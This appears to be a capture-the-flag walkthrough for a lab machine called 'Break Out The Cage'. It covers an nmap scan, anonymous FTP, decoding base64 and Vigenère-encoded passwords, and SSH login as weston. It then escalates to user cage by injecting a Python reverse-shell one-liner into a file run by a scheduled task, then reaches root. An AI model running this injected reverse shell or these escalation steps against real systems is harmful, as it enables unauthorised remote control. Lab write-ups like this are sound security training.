Break Out The Cage

January 16, 2024

# Nmap 7.94 scan initiated Tue Jan 16 14:51:09 2024 as: nmap -sC -sV -oN nmap -vv 10.10.252.99
Increasing send delay for 10.10.252.99 from 0 to 5 due to 11 out of 27 dropped probes since last increase.
Nmap scan report for 10.10.252.99
Host is up, received syn-ack (0.37s latency).
Scanned at 2024-01-16 14:51:10 PST for 112s
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             396 May 25  2020 dad_tasks
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.135.209
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDn+KLEDP81/6ceCvdFeDrLFYWSWc6UnOmmpiNeXuyr+GRvE5Eff4DOeTbiEIcHQkkPcz2QXiOLd9SMjCEgAqmZiZE/mv1HJpQfmRLOufOlf9oZ1TIZf7ehKcVqX0W3nuQeC+M2wLBse2lGhovnTSaZKLKRjQCP2yD1EzND/xFA88oFpahvr6vJfyGOTADjc83AJq9n3Gnil4Nd88xNsIKTl01Mm9ikE/3n/XFbwzYa2bYJRVr+lWWRd+EU3sYTY80PQgBiw6ZPT0QCe0lQfmcgCqu4hC+t/kyfmMRlbtjN/yZJ0gCWeVVAV+A4NNgsOqFbXUT+c6ATzYNhBXRojJED
|   256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA3G1rdbZBOf44Cvz2YGtC5WhIHfHQhtShY8miCVHayvHM/9reA8VvLx9jBOa+iClhm/HairgvNV6pYV6Jg6MII=
|   256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFiTPEbVpYmF2d/NDdhVYlXWA5PmTHhtrtlAaTiEuZOj
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Nicholas Cage Stories
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 16 14:53:02 2024 -- 1 IP address (1 host up) scanned in 112.67 seconds

ftp 10.10.252.99 21

The file looks like a base64 encoded

Then i actually decode it in the terminal

echo "" | base64 -d

Then we will put this cipher into cipher analyzer online so that we can identify what kind of cipher is this

Looks like this is vigenere cipher, we will find a solver for this

Once we find the decoded cipher text

Now we have a password which is "Mydadisghostrideraintthatcoolnocausehesonfirejokes"

Then we will shh to user weston

ssh weston@10.10.252.132

Then run it in the victim machine

As we can see here that this is the content of the python file

ORRRRR we can use this command to find the files that user cage is accessing

find / -user cage 2> /dev/null

Then move to the directory

Then we will edit the .quotes file

And delete all of the contents and put this in,

This will create a reverse shell and we will get a reverse shell to the user cage

But of course we need to wait for the task to execute the file.

"hello" && python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.135.209^C4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Then after that we are now cage user

As we read through the emails we can see that there is a hint in the email files

Once again we will decode this vigenere cipher using face key

Then we get the result which is "cageisnotalegend"

Then we can just change user to root with the password that we decipher

su root

Now go find the flags

Orrrrrrrrrr

We can get the root through this way